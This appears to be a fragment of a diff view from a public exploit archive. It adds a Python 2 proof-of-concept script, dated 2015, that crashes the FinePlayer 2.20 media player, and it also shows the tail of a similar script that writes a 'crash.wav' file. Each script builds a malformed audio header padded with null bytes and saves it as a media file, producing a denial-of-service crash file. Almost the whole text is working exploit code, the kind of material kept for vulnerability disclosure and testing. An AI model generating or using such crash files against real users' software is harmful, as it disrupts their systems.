crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
|
||||||
|
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
|
||||||
|
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
|
||||||
|
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||||
|
|
||||||
|
filename = "crash.wav"
|
||||||
|
file = open(filename , "w")
|
||||||
|
file.write(crash)
|
||||||
|
print "\n Files Created!\n"
|
||||||
|
file.close()
|
44
platforms/windows/dos/37300.py
Executable file
44
platforms/windows/dos/37300.py
Executable file
|
@ -0,0 +1,44 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
#[+] Author: SATHISH ARTHAR
|
||||||
|
#[+] Exploit Title: FinePlayer - 2.20 Memory Corruption PoC
|
||||||
|
#[+] Date: 16-06-2015
|
||||||
|
#[+] Category: DoS/PoC
|
||||||
|
#[+] Tested on: WinXp/Windows 7
|
||||||
|
#[+] Vendor: http://www.gitashare.com
|
||||||
|
#[+] Download: http://www.gitashare.com/downloads/fineplayer220.zip
|
||||||
|
#[+] Sites: sathisharthars.wordpress.com
|
||||||
|
#[+] Twitter: @sathisharthars
|
||||||
|
#[+] Thanks: offensive security (@offsectraining)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
import os
|
||||||
|
os.system("color 02")
|
||||||
|
|
||||||
|
print"###########################################################"
|
||||||
|
print"# Title: FinePlayer - 2.20 Memory Corruption PoC #"
|
||||||
|
print"# Author: SATHISH ARTHAR #"
|
||||||
|
print"# Category: DoS/PoC # "
|
||||||
|
print"###########################################################"
|
||||||
|
|
||||||
|
crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
|
||||||
|
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
|
||||||
|
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
|
||||||
|
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||||
|
|
||||||
|
filename = "crash.mp4"
|
||||||
|
file = open(filename , "w")
|
||||||
|
file.write(crash)
|
||||||
|
print "\n Files Created!\n"
|
||||||
|
file.close()
|
Loading…
Add table
Reference in a new issue